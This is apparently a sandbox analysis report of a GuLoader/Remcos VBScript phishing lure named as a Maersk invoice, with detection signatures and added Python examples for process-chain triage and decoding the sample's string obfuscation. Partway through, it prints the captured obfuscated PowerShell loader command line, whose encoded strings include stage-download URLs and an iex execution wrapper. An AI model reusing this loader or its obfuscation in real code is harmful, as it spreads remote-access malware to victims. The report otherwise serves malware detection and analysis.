Windows
Analysis Report
Maersk_BL_Invoice_Packinglist.vbs
Overview
General Information
Detection
GuLoader, Remcos
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
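Several of the signatures above (Wscript starts Powershell, Very long command line found, Obfuscated command line found, Suspicious powershell command line found) describe one process chain: a Windows Script Host process spawning PowerShell with a multi-kilobyte, obfuscated argument. The Python below is an added triage example, not part of the sandbox report: it runs over constructed process-creation records, flags a script-host-to-shell parent/child pair, and lists which obfuscation markers the command line carries. The thresholds, the event fields and the sample command line are assumptions made for this example; the markers it checks for mirror constructs visible in the captured PowerShell further down the report (a long junk-word literal passed to write, a method name assembled from a variable, and the call operator applied to a variable).

```python
"""Process-creation triage for the WScript -> PowerShell chain flagged above.
Added example with constructed events; thresholds and field names are
assumptions, not values taken from the sandbox report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumed thresholds. The captured command line runs to several thousand
# characters; ordinary admin one-liners rarely pass 1000.
LONG_CMDLINE_CHARS = 1000
LONG_LITERAL_CHARS = 40

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


@dataclass
class ProcessEvent:
    """Minimal stand-in for a Sysmon Event ID 1 / EDR process-creation record."""
    pid: int
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def obfuscation_markers(cmdline: str) -> List[str]:
    """Explain why a command line looks obfuscated.

    Each check corresponds to something visible in the captured PowerShell:
    the size of the command line, the long junk-word literal handed to
    `write`, a method name built from a variable (`.$Stregninger.Invoke(`)
    and the call operator applied to a variable (`& ($Catguts)`).
    """
    reasons = []
    if len(cmdline) >= LONG_CMDLINE_CHARS:
        reasons.append("very long command line")
    if re.search(r"'[^']{%d,}'" % LONG_LITERAL_CHARS, cmdline):
        reasons.append("long quoted literal")
    if re.search(r"\.\$\w+\.Invoke\(", cmdline, re.IGNORECASE):
        reasons.append("method name built from a variable")
    if re.search(r"&\s*\(\s*\$\w+\s*\)", cmdline):
        reasons.append("call operator on a variable")
    return reasons


def classify(ev: ProcessEvent) -> Optional[Dict[str, object]]:
    """Return a finding for script host -> shell; None for anything else."""
    if basename(ev.parent_image) not in SCRIPT_HOSTS:
        return None
    if basename(ev.image) not in SHELLS:
        return None
    return {
        "pid": ev.pid,
        "parent": basename(ev.parent_image),
        "child": basename(ev.image),
        "reasons": obfuscation_markers(ev.command_line),
    }


def triage(events: List[ProcessEvent]) -> List[Dict[str, object]]:
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed command line imitating the captured one: a long lure-word
# literal, a Substring decoder whose method name is built at run time, and
# `& ($ex)` standing in for the invoke-expression call. Not the sample text.
SUSPICIOUS_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "cls;write \''
    + " ".join(["Lureword"] * 120)
    + "';If (${host}.CurrentCulture) {$k++;}"
    "Function dec($s){$n=$s.Length-$k;$m='SUBsTRI';$m+='ng';"
    "For( $i=1; $i -lt $n;$i+=2){$o+=$s.$m.Invoke( $i, $k);}$o;}"
    "function run($c){ & ($ex) ($c);}$ex=dec ' iDe x, ';\""
)

SAMPLE_EVENTS = [  # constructed records
    ProcessEvent(4412, r"C:\Windows\System32\WScript.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 SUSPICIOUS_CMDLINE),
    ProcessEvent(5120, r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ProcessEvent(6300, r"C:\Windows\System32\cscript.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The third constructed event is kept deliberately: cscript.exe launching cmd.exe is still a script-host-to-shell pair and is reported, but with an empty reasons list, so an analyst can separate "unusual parent" from "unusual parent plus obfuscated payload" without two separate rules.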
Classification
- System is w10x64
wscript.exe (PID: 6172 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  powershell.exe (PID: 4412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1; $Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMT o z iMlVl, aM/ 5 .I0C ,( WHi n dSo w sP , NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2 T1R.K0G) G GSe cMkPoB /,2B0p1.0 0B1U0 1L F iRrBe,fSo HxS/M1A2D1 A.,0s ';$Grampa=toddyernes ' U PsCe rA- A UgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : / P/ cSo n,t FeEm e.g a P.Vc o,m . Dd oE/NO.u mtHgKa,s s e,d ..eTm Tz >,h t,t FpR: /,/ 1 0 3 .R1B9 P5,.I2.3M7 .P4,3D/,O UuNtSgDa.s ss,eSd . e Sm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd ,aUtUaB% \ PSTcAaGb.r o s.eHl,y D. Tho.rZ A& & .eVcC h,oH BtO ' ;Unopportunely (toddyernes '.$ Cg lAoEb a .l.:OFFl a gSkTn,a p Rp.e rps,= (.c,m d H /ScS I$,C h a,rMaSck tBeIr,iGs, a t iFoUn, )U ');Unopportunely (toddyernes 'b$sg l. oAbSaAl :A S.k a lBa tBr ipnPn, e.tTsT=S$N SCiRd dSe mAbPlHe r. . sSp,lCiY tG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt. . S.e,r v, iUc e P o. i,n tBMdaC n a gKe rl ].:S:SSUe cAuRrtiNt ySPSrSoRtK oFc o l ,= , U[CNue t .. SSe cSu PrTiPt.y.P ur.oRtPoUc ,o l TSyAp eA]B:G: T blSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : S LoPlNdbe r iFe tRsS= N.eOwC- O NbUj eBc t SMyAs tS ePmF.BNVeA tK. W ePbY CMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunel
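Every meaningful string in the PowerShell above is hidden behind one small decoder, the function the sample calls toddyernes: junk characters occupy the even positions of each literal, and the loop copies only the odd positions, one character ($Bofllen, which is 1 after the ${host}.CurrentCulture check) at a time, stopping one short of the end. The decoded values are then executed through Unopportunely, which is `& ($Catguts)` with $Catguts decoding to iex. The Python below is an added example, not code from the report or from the sample: it reimplements that decoder, harvests every literal passed directly to the decoder function, and splits the decoded URL string on the decoded separator the way the script does before taking $Skalatrinnets[0]. The two short literals ' >. ' and ' iDe x, ' are copied from the captured command line and decode to > and iex; the longer literals are constructed here from placeholder plaintext, because as rendered in this report the captured command line has had runs of spaces collapsed, so its long literals no longer decode cleanly from the text alone. The junk alphabet and the placeholder URLs are assumptions made for the example.

```python
"""Decoder for the character-interleaving obfuscation in the captured
PowerShell. Added example, not part of the sandbox report or the sample."""
import re
from itertools import cycle
from typing import Dict, List

# $Bofllen in the sample: starts undefined (0), incremented once because
# ${host}.CurrentCulture is non-empty, so each Substring call takes one char.
BOFLLEN = 1


def decode_interleaved(literal: str) -> str:
    """Replicate toddyernes.

    PowerShell: For($i=1; $i -lt $s.Length-$Bofllen; $i+=2){ $o += $s.Substring($i, $Bofllen) }
    Real characters sit at odd indices, junk at even indices. Because the
    bound is Length-1, the final character of the literal is never read.
    """
    limit = len(literal) - BOFLLEN
    return "".join(literal[i:i + BOFLLEN] for i in range(1, limit, 2))


def encode_interleaved(plain: str, junk: str = " ,.ABCDEFGHIJKLMNOP") -> str:
    """Inverse of decode_interleaved, used here only to build test input:
    one junk character before each real one, plus a trailing junk character
    (assumed alphabet; the sample's junk is mixed letters, spaces and punctuation)."""
    body = "".join(j + ch for ch, j in zip(plain, cycle(junk)))
    return body + junk[0]


def harvest_literals(script: str, decoder_name: str) -> Dict[str, str]:
    """Map every single-quoted literal passed straight to the decoder to its plaintext."""
    pattern = re.compile(re.escape(decoder_name) + r"\s+'([^']*)'")
    return {m.group(1): decode_interleaved(m.group(1)) for m in pattern.finditer(script)}


def split_stage_urls(decoded_urls: str, separator: str) -> List[str]:
    """The sample splits its URL string on the decoded $Hamskiftets ('>') and
    tries $Skalatrinnets[0] first; the remaining entries are fallbacks."""
    return decoded_urls.split(separator)


# Constructed fragment in the sample's shape. The two short literals are
# copied from the captured command line; the long ones are encoded here from
# placeholder plaintext (RFC 2606 / RFC 5737 names and addresses).
STAGE_URLS = "https://primary.example.invalid/stage.bin>http://203.0.113.7/stage.bin"
SAMPLE_SCRIPT = (
    "$Siddembler=toddyernes '" + encode_interleaved(STAGE_URLS) + "';"
    "$Hamskiftets=toddyernes ' >. ';"
    "$Catguts=toddyernes ' iDe x, ';"
    "$Grampa=toddyernes '" + encode_interleaved("User-Agent") + "';"
)

if __name__ == "__main__":
    for encoded, plain in harvest_literals(SAMPLE_SCRIPT, "toddyernes").items():
        print(repr(encoded), "->", repr(plain))
```

When applying this to a fresh capture, take the command line from the process-creation event or the sandbox's raw JSON rather than from a rendered HTML view: the decoder depends on exact character positions, and a single collapsed or wrapped space shifts every subsequent character onto the junk parity.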